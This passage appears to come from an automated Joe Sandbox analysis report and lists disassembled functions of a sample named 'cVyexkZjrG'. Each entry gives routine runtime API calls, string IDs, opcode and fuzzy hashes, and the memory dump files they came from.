• Instruction Fuzzy Hash: C001B1757115109FDB05DF20C8409BD37B5FF86254B954009D90197780EF349AB6DBD9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 5dc9eb295e65b4f55f67d47aa50aee5851e3737dfccd09c8a8a568f9a816bec2
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: C0127D70D05249DFCF04CFA4C490ADDBBB1BF08308F15846AEA45ABB55EB30B996CB60
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: 8a6f7fbad8f475d915d8b7023755977d9e515703a51f7fe2d3b9ebe9c366640e
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 75B16071D0021A9FDB14CF96C8989EEBBF1FF48318F20856ED41AA7B51E7349A46CB50
                            APIs
                              • Part of subcall function 6CC57327: __EH_prolog3.LIBCMT ref: 6CC5732E
                              • Part of subcall function 6CC57327: std::_Lockit::_Lockit.LIBCPMT ref: 6CC57339
                              • Part of subcall function 6CC57327: std::locale::_Setgloballocale.LIBCPMT ref: 6CC57354
                              • Part of subcall function 6CC57327: _Yarn.LIBCPMT ref: 6CC5736A
                              • Part of subcall function 6CC57327: std::_Lockit::~_Lockit.LIBCPMT ref: 6CC573A7
                              • Part of subcall function 6CB22F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB22F95
                              • Part of subcall function 6CB22F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CB22FAF
                              • Part of subcall function 6CB22F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB22FD0
                              • Part of subcall function 6CB22F60: __Getctype.LIBCPMT ref: 6CB23084
                              • Part of subcall function 6CB22F60: std::_Facet_Register.LIBCPMT ref: 6CB2309C
                              • Part of subcall function 6CB22F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CB230B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6CB2211B
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3332196525-1866435925
                            • Opcode ID: f640868891deb91e0ef09169a4e100c7a86e1cf3ffc87ec49732113d88e4fc86
                            • Instruction ID: f87d78c1bba5f1600131528d0a61c80e91382bc52220f01889598d560bb91dad
                            • Opcode Fuzzy Hash: f640868891deb91e0ef09169a4e100c7a86e1cf3ffc87ec49732113d88e4fc86
                            • Instruction Fuzzy Hash: DC41C5B0E013498FDB00CF64C845BAEBBB0FF48318F144268E919AB791E7759995CF91
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCB4ECC
                              • Part of subcall function 6CC9F58A: __EH_prolog.LIBCMT ref: 6CC9F58F
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            • API String ID: 3519838083-2437443688
                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction ID: 4c77f949d5930e891beec04619a4ad4b5091aed47e7f4d70c3b973e118cb7163
                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction Fuzzy Hash: 4121A8B0801B40DFC760DF6AC14429ABBF4BF69718B50C95EC0AA97B51E7B8A608CF55
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CC6B0D0,6CB21DEA,00008000,6CC6B0D0,?,?,?,6CC6AC7F,6CC6B0D0,?,00000000,6CB21DEA), ref: 6CC6ADC9
                            • GetLastError.KERNEL32(?,?,?,6CC6AC7F,6CC6B0D0,?,00000000,6CB21DEA,?,6CC7469E,6CC6B0D0,000000FF,000000FF,00000002,00008000,6CC6B0D0), ref: 6CC6ADD3
                            • __dosmaperr.LIBCMT ref: 6CC6ADDA
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            • API String ID: 2336955059-4022487301
                            • Opcode ID: 605a005ae9ed520bc95c1d8a7466484fa21f50d67a01214b1d2d9e29f33df9f1
                            • Instruction ID: 84781de815f3d2c6516f5e60c40a37c641f63363bd8e014835a331365a475218
                            • Opcode Fuzzy Hash: 605a005ae9ed520bc95c1d8a7466484fa21f50d67a01214b1d2d9e29f33df9f1
                            • Instruction Fuzzy Hash: 8E01D873710525AFCF058F6BCC4589E7B3DEBC63257240249E81197680FB71D9118BA0
                            APIs
                            • GetLastError.KERNEL32(00000008,?,00000000,6CC68453), ref: 6CC649B7
                            • _free.LIBCMT ref: 6CC64A14
                            • _free.LIBCMT ref: 6CC64A4A
                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CC64A55
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 13c366d272c22716abac227c6a8fcd8e7501cc75385f559685b97b3936cf5f32
                            • Instruction ID: 9c11e8759f1af38f9d53780246678b1f6ea4d2378904b612ed332e9662c9d976
                            • Opcode Fuzzy Hash: 13c366d272c22716abac227c6a8fcd8e7501cc75385f559685b97b3936cf5f32
                            • Instruction Fuzzy Hash: 9011A332705500BBAA01DABB4EE4D9A35ADABC277CB650629F624E3FC1FF318C595114
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6CC746EC,00000000,00000000,?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0), ref: 6CC75ED1
                            • GetLastError.KERNEL32(?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?,6CC6B0D0,?,6CC6BD1C,6CC75AB6), ref: 6CC75EDD
                              • Part of subcall function 6CC75F2E: CloseHandle.KERNEL32(FFFFFFFE,6CC75EED,?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?,6CC6B0D0), ref: 6CC75F3E
                            • ___initconout.LIBCMT ref: 6CC75EED
                              • Part of subcall function 6CC75F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CC75EAB,6CC74B3E,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?), ref: 6CC75F22
                            • WriteConsoleW.KERNEL32(00000000,?,6CC746EC,00000000,?,6CC74B51,00000000,00000001,00000000,6CC6B0D0,?,6CC6C286,?,?,6CC6B0D0,?), ref: 6CC75F02
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: 0f04a37856f8a1162337b4527b1d609904b6de31c37a714826bd4585e6aa50e7
                            • Instruction ID: e253eaae12e2d55ae25929c1d4f8e5bc5d730b685e717e84bd5c8f2e03570e40
                            • Opcode Fuzzy Hash: 0f04a37856f8a1162337b4527b1d609904b6de31c37a714826bd4585e6aa50e7
                            • Instruction Fuzzy Hash: 84F0C036601215BBCF235FA5DC0498E3F7AFB0A7A5B094551FB1996620EB32C820DBA0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            • API String ID: 2427045233-4022487301
                            • Opcode ID: 16a8b886b2f140e8e415bf7e58e83ca99aff7b3e3e64d8b69f2195f477c8566b
                            • Instruction ID: 61d0783c28409005b05de8eb5d36ec4dbe651ef8ed21daeeeeaf25a39c2181a1
                            • Opcode Fuzzy Hash: 16a8b886b2f140e8e415bf7e58e83ca99aff7b3e3e64d8b69f2195f477c8566b
                            • Instruction Fuzzy Hash: 18719371D052569FDB118B97CAC4AEE7BB5BF45318F1C4229E820A7E40FF758846CB60
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCA8C5D
                              • Part of subcall function 6CCA761A: __EH_prolog.LIBCMT ref: 6CCA761F
                              • Part of subcall function 6CCA7A2E: __EH_prolog.LIBCMT ref: 6CCA7A33
                              • Part of subcall function 6CCA8EA5: __EH_prolog.LIBCMT ref: 6CCA8EAA
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            • API String ID: 3519838083-1089469559
                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction ID: e8e1c0b5bfcfa389db166d1a240d6dc285a4daa062fce985fc04cef269f83a2d
                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction Fuzzy Hash: 22816D31D0115ADFCF15DFE4D994ADEBBB4AF14318F10409AE516B77A0EB306A0ACB61
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6CB22A76
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            • API String ID: 4194217158-1161259238
                            • Opcode ID: 8a3f074e970dc92f5ed896cd864209f394b2996098d7c29617e6a30d5ee9cc7d
                            • Instruction ID: ee9eedbc04197a3c02616e9ed34ec9a3e077853e4b16c50c3118712f438d4d5f
                            • Opcode Fuzzy Hash: 8a3f074e970dc92f5ed896cd864209f394b2996098d7c29617e6a30d5ee9cc7d
                            • Instruction Fuzzy Hash: 445146B1D002408FCB10CF28C8846AEBBB5FF89324F50856DE849DBB41E335D995CB92
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: CK$CK
                            • API String ID: 3519838083-2096518401
                            • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                            • Instruction ID: 6644b205c568cf89c19727742f47f5e7dc50636248e763b17dbaa96af56c523c
                            • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                            • Instruction Fuzzy Hash: A8518275A00709DFDB10CFA5C880AEEB3B5FB84358F168919EA01E7645E775F906CB60
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CC746D6), ref: 6CC6D01B
                            • __dosmaperr.LIBCMT ref: 6CC6D022
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            • API String ID: 1659562826-4022487301
                            • Opcode ID: 77f730dd72fc1e0ee7f3f4a33558cfeda3be183f8ead3faf0e509951cff00713
                            • Instruction ID: 2a2c93c6d4d8e3b0a94b8a58527e375a2d98228f92361d6fab9328adac7abd7b
                            • Opcode Fuzzy Hash: 77f730dd72fc1e0ee7f3f4a33558cfeda3be183f8ead3faf0e509951cff00713
                            • Instruction Fuzzy Hash: 76419771614194AFEB11AF6FCAC0AA97FB4EF46308F644299E8808BE01F3719C128791
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction ID: 18bd89f0eaac35264a6193d465f78ebdcac56fe4c60f21d2ab96143eaeb4153f
                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction Fuzzy Hash: E0416D31705785EFCB11DFA4D4907FABBA2FF85308F04846EE15A97A50EB31A905CB92
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction ID: 5dc618c15d26960579ac225b4658b5423060c0b375243294729b5a290fbef71f
                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction Fuzzy Hash: 340180B2E01349DADB10DFA984806AEF7B4FF59708F40842EE569F3A50D3749904CB9A
                            APIs
                            • _free.LIBCMT ref: 6CC6DD49
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CC6A63A,?,00000004,?,4B42FCB6,?,?,6CC5F78C,4B42FCB6,?), ref: 6CC6DD85
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2290793827.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                             • Associated: 00000007.00000002.2290776101.000000006CAD0000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291733834.000000006CC78000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292896257.000000006CE43000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            • Opcode ID: 76f374b267089a50c9d38a85e41fc899dc5f59b343d17288896d449baadf590c
                            • Instruction ID: 16d01e6caf5d662b2d954fabe989588e8c4fc2e0c156c7e91d303531389baaf1
                            • Opcode Fuzzy Hash: 76f374b267089a50c9d38a85e41fc899dc5f59b343d17288896d449baadf590c
                            • Instruction Fuzzy Hash: 51F0AF326112056ADB216A27EEC0A9A37689F836A8F354196E9149BE90FB20D401C1F4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: p/K$J
                            • API String ID: 3519838083-2069324279
                            • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                            • Instruction ID: 43fc223ef6c45e7e93662e2851f10d40de78d585b1ae1846c9a8657820d92568
                            • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                            • Instruction Fuzzy Hash: 6701BCB1A117119FD724CF59C5047AABBF8EF85729F10C85E9062A3B40D7F8A5088BA4
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CCCAFCC
                              • Part of subcall function 6CCCA4D1: __EH_prolog.LIBCMT ref: 6CCCA4D6
                              • Part of subcall function 6CCC914B: __EH_prolog.LIBCMT ref: 6CCC9150
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                             • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J
                            • API String ID: 3519838083-2882003284
                            • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                            • Instruction ID: b9d51e9df76cbca80d406eb84b83401813892225c9fb111f0d0e21db6858153d
                            • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                            • Instruction Fuzzy Hash: D00105B1900B50CFC325CF55C5A428AFBE0BB15308F90C95EC0A657B50E7B8A508CB68
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
                            • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                            • Instruction ID: 495c65ae17fc31ff2f5c06e9509f1dd22e718ab3de5301895c4bdea5c6591a3b
                            • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                            • Instruction Fuzzy Hash: 7B51A1719052099FCF01CF95D840BDFBBB1BF1A32CF10442AE81667A90FB75A949CB51
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                            • Associated: 00000007.00000002.2292283177.000000006CD53000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2292307458.000000006CD59000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6cad0000_cVyexkZjrG.jbxd
                            Similarity
                            • API ID:
                            • String ID: (?K$8?K$H?K$CK
                            • API String ID: 0-3450752836
                            • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                            • Instruction ID: acb7d17cc4bb1bfbc4c9484ee25437ae1d071cd7f64cc98271883d5199a39e9e
                            • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                            • Instruction Fuzzy Hash: 37F017B06017009EC3608F06D54869BBBF4EB4270AF50C91EE19A9BA40D3B8A5088FB8